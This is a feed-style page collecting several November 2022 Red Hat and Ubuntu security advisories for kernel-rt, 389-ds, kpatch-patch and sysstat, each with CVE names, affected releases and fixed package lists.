rND7SqjnxPfMUuO7hdb5F9krFlvh3L3dx9xO+wnLvlWz1IalIw2HnT3XuPwqsfbI  
jFMSpxtceVtRBWU2Q3hOuPUBzxXg/BR68uzWJbp5UOntkbjepbXkpfOwqbhwp2AQ  
nRydwjwSMHE=1Kbx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8679-01

Red Hat Security Advisory 2022-8673-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:8673-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8673  
Issue date:        2022-11-29  
CVE Names:         CVE-2022-1158  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Multicast packets are not received by all VFs on the same port even  
though they have the same VLAN (BZ#2117027)

* Backport use of a dedicate thread for timer wakeups (BZ#2127206)

* Update RT source tree to the RHEL-8.4.z13 source tree. (BZ#2129948)

* Cannot trigger kernel dump using NMI on SNO node running PAO and RT  
kernel  [RT-8] (BZ#2139853)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.71.1.rt7.143.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4ZVsdzjgjWX9erEAQizwA/9HsqWNFvtZGAaKnR2FjFT2Ry99Vglsmor  
e14rydyVgcG7g9nHFDj5S63+e0pELNJWWhrqIi/GiNaI4HyNlyRvFnmJFUP/xbVy  
g0kv3hAZy2T36ZDgjb+1fdwlBNDlJ/xHRwxb7gkQJL3M9soeJlvcz6V9rkWt+9Y0  
guB1eQQesUI2ratllLkkw9xbfOS+zEyDS468aPMVjbEHOnRM4/NGNkNgy3VBH4Dh  
aCx0XVmubD/q5Umuy55mW6W89ZyukK+2iPpJnnmsV4IEmM4uMKvn+Okz4bMRSprE  
6BpISUdA0XsLspUSdR4RJscq/8w1QQZAFHvOEQMuWTv3xLyqMeY18IN1vW3KvgUR  
gAfLrm4arpQZKICfSd7Ekvxy83o552a9OiFmP8F9KimURqp+CG7k8jq/Czk2o22g  
jHg34VqRtDMhQ54ZsOuhBarmy4cRoPBHaYaK9gahoaw/Mf9KHBxs8/qpZl+facv4  
Y3rjy1DZ+FhS3JjmVhQeEmDe93QUwEEenthmbHsjbcCZjgzf3Sur0oYTW+b3YBke  
f1wzh0CutwG/DE38MsxLuSyEgrfGAaDj0Q+uZ2SeJfEW4/gAqTStG2S0bUDkI8wI  
GNY3lmymokj4kgqpm/gwQy3ZplcGbB+E2LwiBJhnB2qfKWxF5DVoRyFeVU2gq1+M  
UgjKLL/zWok=rA+M  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8673-01

Red Hat Security Advisory 2022-8680-01 - 389 Directory Server is an LDAP version 3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: 389-ds:1.4 security update  
Advisory ID:       RHSA-2022:8680-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8680  
Issue date:        2022-11-29  
CVE Names:         CVE-2022-2850  
====================================================================  
1. Summary:

An update for the 389-ds:1.4 module is now available for Red Hat Enterprise  
Linux 8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The  
base packages include the Lightweight Directory Access Protocol (LDAP)  
server and command-line utilities for server administration.

Security Fix(es):

* 389-ds-base: SIGSEGV in sync_repl (CVE-2022-2850)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2118691 - CVE-2022-2850 389-ds-base: SIGSEGV in sync_repl

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
389-ds-base-1.4.3.16-24.module+el8.4.0+17207+46c15e64.src.rpm

aarch64:  
389-ds-base-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-debugsource-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-devel-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-legacy-tools-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-legacy-tools-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-libs-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-libs-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-snmp-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm  
389-ds-base-snmp-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.aarch64.rpm

noarch:  
python3-lib389-1.4.3.16-24.module+el8.4.0+17207+46c15e64.noarch.rpm

ppc64le:  
389-ds-base-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-debugsource-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-devel-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-legacy-tools-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-legacy-tools-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-libs-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-libs-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-snmp-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm  
389-ds-base-snmp-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.ppc64le.rpm

s390x:  
389-ds-base-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-debugsource-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-devel-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-legacy-tools-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-legacy-tools-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-libs-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-libs-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-snmp-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm  
389-ds-base-snmp-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.s390x.rpm

x86_64:  
389-ds-base-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-debugsource-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-devel-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-legacy-tools-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-legacy-tools-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-libs-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-libs-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-snmp-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm  
389-ds-base-snmp-debuginfo-1.4.3.16-24.module+el8.4.0+17207+46c15e64.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2850  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4ZVq9zjgjWX9erEAQgN6w/9FgnFBwtvSCkPKVbDSE8QF3euT0AaeSkW  
FZG525zWkhudCbSrrKPdFqEjCfQ4Rg5r05DSB4YKrXNDgNskbjP6zz5RGe7JC1gm  
Wm8y2WbGb9XGkzNXkccFV0+ns70bKmNnzjijdGgo9BKouQl5/8k7xhpgB44xHIxn  
Qj4rclpCoob9MJfsCyNMtsKufDHgDOnB3h2uBNcuARcnH07FWFbYv4X849pK6hcW  
Izfek5N3urm3jfktJyj7lBoe1PKdTAps+VxSOuSFwLcHUejJOJo7hFsaNX+Gy0m/  
RHcINkOeRc83UDsV7qsw+A4v7THkAtW9tiu8r8ascVDzxcDZEFYG1IvJ86KJeu/V  
0zP4B61xSmF63g2s1U7Ua5mzi7RnYLyJCPlbyN4x6kzlUdJnrs92RSmU8Bt9ZqkS  
9fXmwkoHk2TO7qgSwd09T1bYzWgvFwOHKVkulcpOJezFye9q6hJnZroloZiGT3tK  
VZO1s/nL55KNGC0PVQANHSbj/hBKHXABgdhvZYjzUTNtr9KAo4GJLoTY8qfr9gSg  
eIkyQMDZaB//XgyIjGs4ZdsWN6HFa0uhm2FRwHMm1OJ4uy8WLYWogKoTFI+HH3Bz  
2Gn+83pAebqmvBh+RkXMjd7h5hrq5nKw+ym1FAam5BBzk6X/md8XSlPOves6beUw  
zVN0canYLeI=yNU6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8680-01

Ubuntu Security Notice 5748-1 - It was discovered that Sysstat incorrectly handled certain arithmetic multiplications. An attacker could use this issue to cause Sysstat to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5748-1  
November 29, 2022

sysstat vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Sysstat could be made to crash or run programs if it processed specially  
crafted data.

Software Description:  
- sysstat: system performance tools for Linux

Details:

It was discovered that Sysstat incorrectly handled certain arithmetic  
multiplications. An attacker could use this issue to cause Sysstat to  
crash, resulting in a denial of service, or possibly execute arbitrary  
code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   isag                            12.5.6-1ubuntu0.1  
   sysstat                         12.5.6-1ubuntu0.1

Ubuntu 22.04 LTS:  
   isag                            12.5.2-2ubuntu0.1  
   sysstat                         12.5.2-2ubuntu0.1

Ubuntu 20.04 LTS:  
   isag                            12.2.0-2ubuntu0.2  
   sysstat                         12.2.0-2ubuntu0.2

Ubuntu 18.04 LTS:  
   isag                            11.6.1-1ubuntu0.2  
   sysstat                         11.6.1-1ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5748-1  
   CVE-2022-39377

Package Information:  
   https://launchpad.net/ubuntu/+source/sysstat/12.5.6-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/sysstat/12.5.2-2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/sysstat/12.2.0-2ubuntu0.2  
   https://launchpad.net/ubuntu/+source/sysstat/11.6.1-1ubuntu0.2

Ubuntu Security Notice USN-5748-1

Red Hat Security Advisory 2022-8686-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2022:8686-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8686  
Issue date:        2022-11-29  
CVE Names:         CVE-2022-1158   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
kpatch-patch-4_18_0-305_49_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_57_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_62_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_65_1-1-1.el8_4.src.rpm

x86_64:  
kpatch-patch-4_18_0-305_49_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_49_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_49_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_57_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_57_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_57_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_62_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_62_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_62_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4ZVqdzjgjWX9erEAQgBYg/8Cpz2ww/tCVnt9RRI4kWfdE/K3Yzd+psu  
XoZSApva1hssJcAT9urokvs0ChxAyNIXd+olTrGybyA+sdi5t5xhB0LTFMk2fYEy  
HVyEy2fMUAvXOyU4L1po8NX+n/MbWJERAbI+K2q9HKuQSTl88cHy1HRcgECUTx1P  
ax8CVxByalzx0bSPUkGLPxNfu0M56VYBPQ5VBnje9j98hWx0tefvf0JFkdv0HsDA  
DdaHkY+DUTSUtsCPwpFU9i0epfSWXBHcJUnn1qE+BcbpKZOzCIi9PC+8MV/e8vgS  
to4P5oLXJTKFgWIa+iLMHYZqJCEjBI65xeO6aVro6kJNz+jdI1boDatE90iNSJnm  
+QwcGhwAEiWVMMXscAOQbM/Wlkv/I0NdvH7XAiuLf3cK4geRxSYhk+6itwnyEA1V  
aDb1tAN65orYYoA/Y9q3yr0aD5ugpPLU0QkeL0GgK24jBb8h1uy+k0Q4L9gz5wsn  
4BRLgy/LjATTJzjGdwm4MhcalHQPoWjN0AkkU/FYsHv1uqw3oxtRe51lq+IC3SYB  
BMKfspXeIZGvLAlS0sFi+OhqvpJBNsKWm9Zi7T4OznQQAfvhWoEx/joFyoxPSCo8  
YoLty0a4pgcbQeUgf2UGVdsFDmuwgSIcKxZI2dxUdjQfnXr3Qix+6DXDF77tEpU1  
9l/XZLLpnx0=  
=ocx5  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux